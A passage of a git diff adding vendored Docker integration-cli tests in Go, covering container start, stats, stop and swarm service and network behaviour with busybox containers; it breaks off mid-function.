+	// an error should have been shown that you cannot start paused container
+	c.Assert(out, checker.Contains, "Cannot start a paused container, try unpause instead.")
+}
+
+func (s *DockerSuite) TestStartMultipleContainers(c *check.C) {
+	// Windows does not support --link
+	testRequires(c, DaemonIsLinux)
+	// run a container named 'parent' and create two container link to `parent`
+	dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top")
+
+	for _, container := range []string{"child_first", "child_second"} {
+		dockerCmd(c, "create", "--name", container, "--link", "parent:parent", "busybox", "top")
+	}
+
+	// stop 'parent' container
+	dockerCmd(c, "stop", "parent")
+
+	out := inspectField(c, "parent", "State.Running")
+	// Container should be stopped
+	c.Assert(out, checker.Equals, "false")
+
+	// start all the three containers, container `child_first` start first which should be failed
+	// container 'parent' start second and then start container 'child_second'
+	expOut := "Cannot link to a non running container"
+	expErr := "failed to start containers: [child_first]"
+	out, _, err := dockerCmdWithError("start", "child_first", "parent", "child_second")
+	// err shouldn't be nil because start will fail
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	// output does not correspond to what was expected
+	if !(strings.Contains(out, expOut) || strings.Contains(err.Error(), expErr)) {
+		c.Fatalf("Expected out: %v with err: %v  but got out: %v with err: %v", expOut, expErr, out, err)
+	}
+
+	for container, expected := range map[string]string{"parent": "true", "child_first": "false", "child_second": "true"} {
+		out := inspectField(c, container, "State.Running")
+		// Container running state wrong
+		c.Assert(out, checker.Equals, expected)
+	}
+}
+
+func (s *DockerSuite) TestStartAttachMultipleContainers(c *check.C) {
+	// run  multiple containers to test
+	for _, container := range []string{"test1", "test2", "test3"} {
+		runSleepingContainer(c, "--name", container)
+	}
+
+	// stop all the containers
+	for _, container := range []string{"test1", "test2", "test3"} {
+		dockerCmd(c, "stop", container)
+	}
+
+	// test start and attach multiple containers at once, expected error
+	for _, option := range []string{"-a", "-i", "-ai"} {
+		out, _, err := dockerCmdWithError("start", option, "test1", "test2", "test3")
+		// err shouldn't be nil because start will fail
+		c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+		// output does not correspond to what was expected
+		c.Assert(out, checker.Contains, "You cannot start and attach multiple containers at once.")
+	}
+
+	// confirm the state of all the containers be stopped
+	for container, expected := range map[string]string{"test1": "false", "test2": "false", "test3": "false"} {
+		out := inspectField(c, container, "State.Running")
+		// Container running state wrong
+		c.Assert(out, checker.Equals, expected)
+	}
+}
+
+// Test case for #23716
+func (s *DockerSuite) TestStartAttachWithRename(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "create", "-t", "--name", "before", "busybox")
+	go func() {
+		c.Assert(waitRun("before"), checker.IsNil)
+		dockerCmd(c, "rename", "before", "after")
+		dockerCmd(c, "stop", "--time=2", "after")
+	}()
+	_, stderr, _, _ := runCommandWithStdoutStderr(exec.Command(dockerBinary, "start", "-a", "before"))
+	c.Assert(stderr, checker.Not(checker.Contains), "No such container")
+}
+
+func (s *DockerSuite) TestStartReturnCorrectExitCode(c *check.C) {
+	dockerCmd(c, "create", "--restart=on-failure:2", "--name", "withRestart", "busybox", "sh", "-c", "exit 11")
+	dockerCmd(c, "create", "--rm", "--name", "withRm", "busybox", "sh", "-c", "exit 12")
+
+	_, exitCode, err := dockerCmdWithError("start", "-a", "withRestart")
+	c.Assert(err, checker.NotNil)
+	c.Assert(exitCode, checker.Equals, 11)
+	_, exitCode, err = dockerCmdWithError("start", "-a", "withRm")
+	c.Assert(err, checker.NotNil)
+	c.Assert(exitCode, checker.Equals, 12)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go
new file mode 100644
index 0000000000..5cb1a3ea02
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stats_test.go
@@ -0,0 +1,159 @@
+package main
+
+import (
+	"bufio"
+	"os/exec"
+	"regexp"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestStatsNoStream(c *check.C) {
+	// Windows does not support stats
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	id := strings.TrimSpace(out)
+	c.Assert(waitRun(id), checker.IsNil)
+
+	statsCmd := exec.Command(dockerBinary, "stats", "--no-stream", id)
+	type output struct {
+		out []byte
+		err error
+	}
+
+	ch := make(chan output)
+	go func() {
+		out, err := statsCmd.Output()
+		ch <- output{out, err}
+	}()
+
+	select {
+	case outerr := <-ch:
+		c.Assert(outerr.err, checker.IsNil, check.Commentf("Error running stats: %v", outerr.err))
+		c.Assert(string(outerr.out), checker.Contains, id) //running container wasn't present in output
+	case <-time.After(3 * time.Second):
+		statsCmd.Process.Kill()
+		c.Fatalf("stats did not return immediately when not streaming")
+	}
+}
+
+func (s *DockerSuite) TestStatsContainerNotFound(c *check.C) {
+	// Windows does not support stats
+	testRequires(c, DaemonIsLinux)
+
+	out, _, err := dockerCmdWithError("stats", "notfound")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "No such container: notfound", check.Commentf("Expected to fail on not found container stats, got %q instead", out))
+
+	out, _, err = dockerCmdWithError("stats", "--no-stream", "notfound")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "No such container: notfound", check.Commentf("Expected to fail on not found container stats with --no-stream, got %q instead", out))
+}
+
+func (s *DockerSuite) TestStatsAllRunningNoStream(c *check.C) {
+	// Windows does not support stats
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	id1 := strings.TrimSpace(out)[:12]
+	c.Assert(waitRun(id1), check.IsNil)
+	out, _ = dockerCmd(c, "run", "-d", "busybox", "top")
+	id2 := strings.TrimSpace(out)[:12]
+	c.Assert(waitRun(id2), check.IsNil)
+	out, _ = dockerCmd(c, "run", "-d", "busybox", "top")
+	id3 := strings.TrimSpace(out)[:12]
+	c.Assert(waitRun(id3), check.IsNil)
+	dockerCmd(c, "stop", id3)
+
+	out, _ = dockerCmd(c, "stats", "--no-stream")
+	if !strings.Contains(out, id1) || !strings.Contains(out, id2) {
+		c.Fatalf("Expected stats output to contain both %s and %s, got %s", id1, id2, out)
+	}
+	if strings.Contains(out, id3) {
+		c.Fatalf("Did not expect %s in stats, got %s", id3, out)
+	}
+
+	// check output contains real data, but not all zeros
+	reg, _ := regexp.Compile("[1-9]+")
+	// split output with "\n", outLines[1] is id2's output
+	// outLines[2] is id1's output
+	outLines := strings.Split(out, "\n")
+	// check stat result of id2 contains real data
+	realData := reg.Find([]byte(outLines[1][12:]))
+	c.Assert(realData, checker.NotNil, check.Commentf("stat result are empty: %s", out))
+	// check stat result of id1 contains real data
+	realData = reg.Find([]byte(outLines[2][12:]))
+	c.Assert(realData, checker.NotNil, check.Commentf("stat result are empty: %s", out))
+}
+
+func (s *DockerSuite) TestStatsAllNoStream(c *check.C) {
+	// Windows does not support stats
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	id1 := strings.TrimSpace(out)[:12]
+	c.Assert(waitRun(id1), check.IsNil)
+	dockerCmd(c, "stop", id1)
+	out, _ = dockerCmd(c, "run", "-d", "busybox", "top")
+	id2 := strings.TrimSpace(out)[:12]
+	c.Assert(waitRun(id2), check.IsNil)
+
+	out, _ = dockerCmd(c, "stats", "--all", "--no-stream")
+	if !strings.Contains(out, id1) || !strings.Contains(out, id2) {
+		c.Fatalf("Expected stats output to contain both %s and %s, got %s", id1, id2, out)
+	}
+
+	// check output contains real data, but not all zeros
+	reg, _ := regexp.Compile("[1-9]+")
+	// split output with "\n", outLines[1] is id2's output
+	outLines := strings.Split(out, "\n")
+	// check stat result of id2 contains real data
+	realData := reg.Find([]byte(outLines[1][12:]))
+	c.Assert(realData, checker.NotNil, check.Commentf("stat result of %s is empty: %s", id2, out))
+	// check stat result of id1 contains all zero
+	realData = reg.Find([]byte(outLines[2][12:]))
+	c.Assert(realData, checker.IsNil, check.Commentf("stat result of %s should be empty : %s", id1, out))
+}
+
+func (s *DockerSuite) TestStatsAllNewContainersAdded(c *check.C) {
+	// Windows does not support stats
+	testRequires(c, DaemonIsLinux)
+
+	id := make(chan string)
+	addedChan := make(chan struct{})
+
+	runSleepingContainer(c, "-d")
+	statsCmd := exec.Command(dockerBinary, "stats")
+	stdout, err := statsCmd.StdoutPipe()
+	c.Assert(err, check.IsNil)
+	c.Assert(statsCmd.Start(), check.IsNil)
+	defer statsCmd.Process.Kill()
+
+	go func() {
+		containerID := <-id
+		matchID := regexp.MustCompile(containerID)
+
+		scanner := bufio.NewScanner(stdout)
+		for scanner.Scan() {
+			switch {
+			case matchID.MatchString(scanner.Text()):
+				close(addedChan)
+				return
+			}
+		}
+	}()
+
+	out, _ := runSleepingContainer(c, "-d")
+	c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil)
+	id <- strings.TrimSpace(out)[:12]
+
+	select {
+	case <-time.After(30 * time.Second):
+		c.Fatal("failed to observe new container created added to stats")
+	case <-addedChan:
+		// ignore, done
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go
new file mode 100644
index 0000000000..103d01374c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go
@@ -0,0 +1,17 @@
+package main
+
+import (
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestStopContainerWithRestartPolicyAlways(c *check.C) {
+	dockerCmd(c, "run", "--name", "verifyRestart1", "-d", "--restart=always", "busybox", "false")
+	dockerCmd(c, "run", "--name", "verifyRestart2", "-d", "--restart=always", "busybox", "false")
+
+	c.Assert(waitRun("verifyRestart1"), checker.IsNil)
+	c.Assert(waitRun("verifyRestart2"), checker.IsNil)
+
+	dockerCmd(c, "stop", "verifyRestart1")
+	dockerCmd(c, "stop", "verifyRestart2")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go
new file mode 100644
index 0000000000..8eae162cba
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_swarm_test.go
@@ -0,0 +1,1254 @@
+// +build !windows
+
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/libnetwork/driverapi"
+	"github.com/docker/libnetwork/ipamapi"
+	remoteipam "github.com/docker/libnetwork/ipams/remote/api"
+	"github.com/go-check/check"
+	"github.com/vishvananda/netlink"
+)
+
+func (s *DockerSwarmSuite) TestSwarmUpdate(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	getSpec := func() swarm.Spec {
+		sw := d.getSwarm(c)
+		return sw.Spec
+	}
+
+	out, err := d.Cmd("swarm", "update", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+
+	spec := getSpec()
+	c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour)
+	c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second)
+
+	// setting anything under 30m for cert-expiry is not allowed
+	out, err = d.Cmd("swarm", "update", "--cert-expiry", "15m")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "minimum certificate expiry time")
+	spec = getSpec()
+	c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour)
+}
+
+func (s *DockerSwarmSuite) TestSwarmInit(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+
+	getSpec := func() swarm.Spec {
+		sw := d.getSwarm(c)
+		return sw.Spec
+	}
+
+	out, err := d.Cmd("swarm", "init", "--cert-expiry", "30h", "--dispatcher-heartbeat", "11s")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+
+	spec := getSpec()
+	c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 30*time.Hour)
+	c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 11*time.Second)
+
+	c.Assert(d.Leave(true), checker.IsNil)
+	time.Sleep(500 * time.Millisecond) // https://github.com/docker/swarmkit/issues/1421
+	out, err = d.Cmd("swarm", "init")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+
+	spec = getSpec()
+	c.Assert(spec.CAConfig.NodeCertExpiry, checker.Equals, 90*24*time.Hour)
+	c.Assert(spec.Dispatcher.HeartbeatPeriod, checker.Equals, 5*time.Second)
+}
+
+func (s *DockerSwarmSuite) TestSwarmInitIPv6(c *check.C) {
+	testRequires(c, IPv6)
+	d1 := s.AddDaemon(c, false, false)
+	out, err := d1.Cmd("swarm", "init", "--listen-addr", "::1")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+
+	d2 := s.AddDaemon(c, false, false)
+	out, err = d2.Cmd("swarm", "join", "::1")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+
+	out, err = d2.Cmd("info")
+	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
+	c.Assert(out, checker.Contains, "Swarm: active")
+}
+
+func (s *DockerSwarmSuite) TestSwarmInitUnspecifiedAdvertiseAddr(c *check.C) {
+	d := s.AddDaemon(c, false, false)
+	out, err := d.Cmd("swarm", "init", "--advertise-addr", "0.0.0.0")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "advertise address must be a non-zero IP address")
+}
+
+func (s *DockerSwarmSuite) TestSwarmIncompatibleDaemon(c *check.C) {
+	// init swarm mode and stop a daemon
+	d := s.AddDaemon(c, true, true)
+	info, err := d.info()
+	c.Assert(err, checker.IsNil)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	c.Assert(d.Stop(), checker.IsNil)
+
+	// start a daemon with --cluster-store and --cluster-advertise
+	err = d.Start("--cluster-store=consul://consuladdr:consulport/some/path", "--cluster-advertise=1.1.1.1:2375")
+	c.Assert(err, checker.NotNil)
+	content, _ := ioutil.ReadFile(d.logFile.Name())
+	c.Assert(string(content), checker.Contains, "--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode")
+
+	// start a daemon with --live-restore
+	err = d.Start("--live-restore")
+	c.Assert(err, checker.NotNil)
+	content, _ = ioutil.ReadFile(d.logFile.Name())
+	c.Assert(string(content), checker.Contains, "--live-restore daemon configuration is incompatible with swarm mode")
+	// restart for teardown
+	c.Assert(d.Start(), checker.IsNil)
+}
+
+// Test case for #24090
+func (s *DockerSwarmSuite) TestSwarmNodeListHostname(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// The first line should contain "HOSTNAME"
+	out, err := d.Cmd("node", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.Split(out, "\n")[0], checker.Contains, "HOSTNAME")
+}
+
+func (s *DockerSwarmSuite) TestSwarmServiceTemplatingHostname(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("service", "create", "--name", "test", "--hostname", "{{.Service.Name}}-{{.Task.Slot}}", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	containers := d.activeContainers()
+	out, err = d.Cmd("inspect", "--type", "container", "--format", "{{.Config.Hostname}}", containers[0])
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.Split(out, "\n")[0], checker.Equals, "test-1", check.Commentf("hostname with templating invalid"))
+}
+
+// Test case for #24270
+func (s *DockerSwarmSuite) TestSwarmServiceListFilter(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name1 := "redis-cluster-md5"
+	name2 := "redis-cluster"
+	name3 := "other-cluster"
+	out, err := d.Cmd("service", "create", "--name", name1, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	out, err = d.Cmd("service", "create", "--name", name2, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	out, err = d.Cmd("service", "create", "--name", name3, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	filter1 := "name=redis-cluster-md5"
+	filter2 := "name=redis-cluster"
+
+	// We search checker.Contains with `name+" "` to prevent prefix only.
+	out, err = d.Cmd("service", "ls", "--filter", filter1)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name1+" ")
+	c.Assert(out, checker.Not(checker.Contains), name2+" ")
+	c.Assert(out, checker.Not(checker.Contains), name3+" ")
+
+	out, err = d.Cmd("service", "ls", "--filter", filter2)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name1+" ")
+	c.Assert(out, checker.Contains, name2+" ")
+	c.Assert(out, checker.Not(checker.Contains), name3+" ")
+
+	out, err = d.Cmd("service", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name1+" ")
+	c.Assert(out, checker.Contains, name2+" ")
+	c.Assert(out, checker.Contains, name3+" ")
+}
+
+func (s *DockerSwarmSuite) TestSwarmNodeListFilter(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("node", "inspect", "--format", "{{ .Description.Hostname }}", "self")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	name := strings.TrimSpace(out)
+
+	filter := "name=" + name[:4]
+
+	out, err = d.Cmd("node", "ls", "--filter", filter)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+
+	out, err = d.Cmd("node", "ls", "--filter", "name=none")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+}
+
+func (s *DockerSwarmSuite) TestSwarmNodeTaskListFilter(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "redis-cluster-md5"
+	out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 3)
+
+	filter := "name=redis-cluster"
+
+	out, err = d.Cmd("node", "ps", "--filter", filter, "self")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name+".1")
+	c.Assert(out, checker.Contains, name+".2")
+	c.Assert(out, checker.Contains, name+".3")
+
+	out, err = d.Cmd("node", "ps", "--filter", "name=none", "self")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name+".1")
+	c.Assert(out, checker.Not(checker.Contains), name+".2")
+	c.Assert(out, checker.Not(checker.Contains), name+".3")
+}
+
+// Test case for #25375
+func (s *DockerSwarmSuite) TestSwarmPublishAdd(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testCases := []struct {
+		name       string
+		publishAdd []string
+		ports      string
+	}{
+		{
+			name: "simple-syntax",
+			publishAdd: []string{
+				"80:80",
+				"80:80",
+				"80:80",
+				"80:20",
+			},
+			ports: "[{ tcp 80 80 ingress}]",
+		},
+		{
+			name: "complex-syntax",
+			publishAdd: []string{
+				"target=90,published=90,protocol=tcp,mode=ingress",
+				"target=90,published=90,protocol=tcp,mode=ingress",
+				"target=90,published=90,protocol=tcp,mode=ingress",
+				"target=30,published=90,protocol=tcp,mode=ingress",
+			},
+			ports: "[{ tcp 90 90 ingress}]",
+		},
+	}
+
+	for _, tc := range testCases {
+		out, err := d.Cmd("service", "create", "--name", tc.name, "--label", "x=y", "busybox", "top")
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+		c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+		out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[0], tc.name)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+
+		out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[1], tc.name)
+		c.Assert(err, checker.IsNil, check.Commentf(out))
+
+		out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[2], "--publish-add", tc.publishAdd[3], tc.name)
+		c.Assert(err, checker.NotNil, check.Commentf(out))
+
+		out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", tc.name)
+		c.Assert(err, checker.IsNil)
+		c.Assert(strings.TrimSpace(out), checker.Equals, tc.ports)
+	}
+}
+
+func (s *DockerSwarmSuite) TestSwarmServiceWithGroup(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "top"
+	out, err := d.Cmd("service", "create", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	out, err = d.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	container := strings.TrimSpace(out)
+
+	out, err = d.Cmd("exec", container, "id")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "uid=0(root) gid=0(root) groups=10(wheel),29(audio),50(staff),777")
+}
+
+func (s *DockerSwarmSuite) TestSwarmContainerAutoStart(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	out, err = d.Cmd("run", "-id", "--restart=always", "--net=foo", "--name=test", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	out, err = d.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	d.Restart()
+
+	out, err = d.Cmd("ps", "-q")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+}
+
+func (s *DockerSwarmSuite) TestSwarmContainerEndpointOptions(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	_, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	_, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// ping first container and its alias
+	_, err = d.Cmd("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	_, err = d.Cmd("exec", "second", "ping", "-c", "1", "first-alias")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("network", "create", "--attachable", "-d", "overlay", "testnet")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	networkID := strings.TrimSpace(out)
+
+	out, err = d.Cmd("run", "-d", "--net", networkID, "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	cID := strings.TrimSpace(out)
+	d.waitRun(cID)
+
+	_, err = d.Cmd("rm", "-f", cID)
+	c.Assert(err, checker.IsNil)
+
+	out, err = d.Cmd("network", "rm", "testnet")
+	c.Assert(err, checker.IsNil)
+
+	checkNetwork := func(*check.C) (interface{}, check.CommentInterface) {
+		out, err := d.Cmd("network", "ls")
+		c.Assert(err, checker.IsNil)
+		return out, nil
+	}
+
+	waitAndAssert(c, 3*time.Second, checkNetwork, checker.Not(checker.Contains), "testnet")
+}
+
+func (s *DockerSwarmSuite) TestOverlayAttachable(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", "ovnet")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// validate attachable
+	out, err = d.Cmd("network", "inspect", "--format", "{{json .Attachable}}", "ovnet")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "true")
+
+	// validate containers can attache to this overlay network
+	out, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c1", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// redo validation, there was a bug that the value of attachable changes after
+	// containers attach to the network
+	out, err = d.Cmd("network", "inspect", "--format", "{{json .Attachable}}", "ovnet")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "true")
+}
+
+func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create an attachable swarm network
+	nwName := "attovl"
+	out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", nwName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Connect a container to the network
+	out, err = d.Cmd("run", "-d", "--network", nwName, "--name", "c1", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// Leave the swarm
+	err = d.Leave(true)
+	c.Assert(err, checker.IsNil)
+
+	// Check the container is disconnected
+	out, err = d.Cmd("inspect", "c1", "--format", "{{.NetworkSettings.Networks."+nwName+"}}")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "<no value>")
+
+	// Check the network is gone
+	out, err = d.Cmd("network", "ls", "--format", "{{.Name}}")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), nwName)
+}
+
+func (s *DockerSwarmSuite) TestSwarmRemoveInternalNetwork(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "ingress"
+	out, err := d.Cmd("network", "rm", name)
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, name)
+	c.Assert(strings.TrimSpace(out), checker.Contains, "is a pre-defined network and cannot be removed")
+}
+
+// Test case for #24108, also the case from:
+// https://github.com/docker/docker/pull/24620#issuecomment-233715656
+func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	name := "redis-cluster-md5"
+	out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	filter := "name=redis-cluster"
+
+	checkNumTasks := func(*check.C) (interface{}, check.CommentInterface) {
+		out, err := d.Cmd("service", "ps", "--filter", filter, name)
+		c.Assert(err, checker.IsNil)
+		return len(strings.Split(out, "\n")) - 2, nil // includes header and nl in last line
+	}
+
+	// wait until all tasks have been created
+	waitAndAssert(c, defaultReconciliationTimeout, checkNumTasks, checker.Equals, 3)
+
+	out, err = d.Cmd("service", "ps", "--filter", filter, name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name+".1")
+	c.Assert(out, checker.Contains, name+".2")
+	c.Assert(out, checker.Contains, name+".3")
+
+	out, err = d.Cmd("service", "ps", "--filter", "name="+name+".1", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name+".1")
+	c.Assert(out, checker.Not(checker.Contains), name+".2")
+	c.Assert(out, checker.Not(checker.Contains), name+".3")
+
+	out, err = d.Cmd("service", "ps", "--filter", "name=none", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name+".1")
+	c.Assert(out, checker.Not(checker.Contains), name+".2")
+	c.Assert(out, checker.Not(checker.Contains), name+".3")
+
+	name = "redis-cluster-sha1"
+	out, err = d.Cmd("service", "create", "--name", name, "--mode=global", "busybox", "top")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	waitAndAssert(c, defaultReconciliationTimeout, checkNumTasks, checker.Equals, 1)
+
+	filter = "name=redis-cluster"
+	out, err = d.Cmd("service", "ps", "--filter", filter, name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+
+	out, err = d.Cmd("service", "ps", "--filter", "name="+name, name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, name)
+
+	out, err = d.Cmd("service", "ps", "--filter", "name=none", name)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), name)
+}
+
+func (s *DockerSwarmSuite) TestPsListContainersFilterIsTask(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	// Create a bare container
+	out, err := d.Cmd("run", "-d", "--name=bare-container", "busybox", "top")
